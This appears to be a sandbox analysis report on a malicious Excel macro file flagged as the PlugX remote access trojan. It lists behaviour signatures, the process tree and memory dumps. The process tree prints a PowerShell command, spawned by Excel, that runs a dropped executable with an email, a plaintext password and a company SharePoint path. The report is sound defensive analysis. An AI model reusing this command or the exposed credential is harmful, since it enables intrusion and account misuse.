Analysis

  • max time kernel
    163s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    29-03-2022 23:26

General

  • Target

    3bca1997648eb70fd53abcfd9f5b1880b58daea9aa4c8b434790ebb81ace182b.xlsm

  • Size

    1.6MB

  • MD5

    5fab2a427175d69f010acfd2caff68b0

  • SHA1

    69657f55e9fdc505a3681c4e5df680aecb89a780

  • SHA256

    3bca1997648eb70fd53abcfd9f5b1880b58daea9aa4c8b434790ebb81ace182b

  • SHA512

    1cf9b4ee4fb60906198e18a182bce4622bd6c5bef8ef32bedb38442c75c7966cc5ba705730dc3f3cc07dfb4cf60f9b7e70daa3c6975cca8cd405f4ac84e666ad

Score
10/10

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • PlugX Rat Payload 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3bca1997648eb70fd53abcfd9f5b1880b58daea9aa4c8b434790ebb81ace182b.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:4824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3136
      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
        "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 7152
        2⤵
        • Process spawned suspicious child process
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\system32\dwwin.exe
          C:\Windows\system32\dwwin.exe -x -s 7152
          3⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:3412
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:1504

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1528-148-0x000002B2FEF70000-0x000002B2FEF92000-memory.dmp
        Filesize

        136KB

      • memory/1528-133-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp
        Filesize

        64KB

      • memory/1528-146-0x000002AAF6C90000-0x000002AAF6CA0000-memory.dmp
        Filesize

        64KB

      • memory/1528-147-0x000002AAF6CA0000-0x000002AAF6CAA000-memory.dmp
        Filesize

        40KB

      • memory/1528-134-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp
        Filesize

        64KB

      • memory/1528-158-0x000002AA9C10B000-0x000002AA9C10F000-memory.dmp
        Filesize

        16KB

      • memory/1528-136-0x000002B2FFAF0000-0x000002B2FFAF4000-memory.dmp
        Filesize

        16KB

      • memory/1528-137-0x000002AA9C110000-0x000002AA9C2B2000-memory.dmp
        Filesize

        1.6MB

      • memory/1528-138-0x00007FFE76070000-0x00007FFE76B31000-memory.dmp
        Filesize

        10.8MB

      • memory/1528-139-0x000002AA9C100000-0x000002AA9C102000-memory.dmp
        Filesize

        8KB

      • memory/1528-140-0x000002B302A60000-0x000002B3054C0000-memory.dmp
        Filesize

        42.4MB

      • memory/1528-141-0x000002B300000000-0x000002B300294000-memory.dmp
        Filesize

        2.6MB

      • memory/1528-142-0x000002B2FEF10000-0x000002B2FEF6C000-memory.dmp
        Filesize

        368KB

      • memory/1528-143-0x000002B3002A0000-0x000002B300462000-memory.dmp
        Filesize

        1.8MB

      • memory/1528-144-0x000002B2FEEB0000-0x000002B2FEED2000-memory.dmp
        Filesize

        136KB

      • memory/1528-145-0x000002B301200000-0x000002B301F90000-memory.dmp
        Filesize

        13.6MB

      • memory/1528-131-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp
        Filesize

        64KB

      • memory/1528-130-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp
        Filesize

        64KB

      • memory/1528-132-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp
        Filesize

        64KB

      • memory/1528-149-0x000002AA9C103000-0x000002AA9C105000-memory.dmp
        Filesize

        8KB

      • memory/1528-150-0x000002B3097E0000-0x000002B30DAF6000-memory.dmp
        Filesize

        67.1MB

      • memory/1528-151-0x000002B2FEFA0000-0x000002B2FEFC8000-memory.dmp
        Filesize

        160KB

      • memory/1528-152-0x000002B2FFCF0000-0x000002B2FFD40000-memory.dmp
        Filesize

        320KB

      • memory/1528-153-0x000002AAF6CB0000-0x000002AAF6CC0000-memory.dmp
        Filesize

        64KB

      • memory/1528-154-0x000002B2FEEE0000-0x000002B2FEEF8000-memory.dmp
        Filesize

        96KB

      • memory/1528-155-0x000002AA9BF40000-0x000002AA9BF9A000-memory.dmp
        Filesize

        360KB

      • memory/1528-156-0x000002AA9C106000-0x000002AA9C108000-memory.dmp
        Filesize

        8KB

      • memory/1528-157-0x000002AA9C109000-0x000002AA9C10B000-memory.dmp
        Filesize

        8KB

      • memory/2728-164-0x0000000000000000-mapping.dmp
      • memory/3136-159-0x0000000000000000-mapping.dmp
      • memory/3136-160-0x000001E3F59E0000-0x000001E3F5A02000-memory.dmp
        Filesize

        136KB

      • memory/3136-161-0x00007FFE76070000-0x00007FFE76B31000-memory.dmp
        Filesize

        10.8MB

      • memory/3136-162-0x000001E3F5A50000-0x000001E3F5A52000-memory.dmp
        Filesize

        8KB

      • memory/3136-163-0x000001E3F5A53000-0x000001E3F5A55000-memory.dmp
        Filesize

        8KB

      • memory/3412-170-0x0000000000000000-mapping.dmp
      • memory/4824-135-0x0000000000000000-mapping.dmp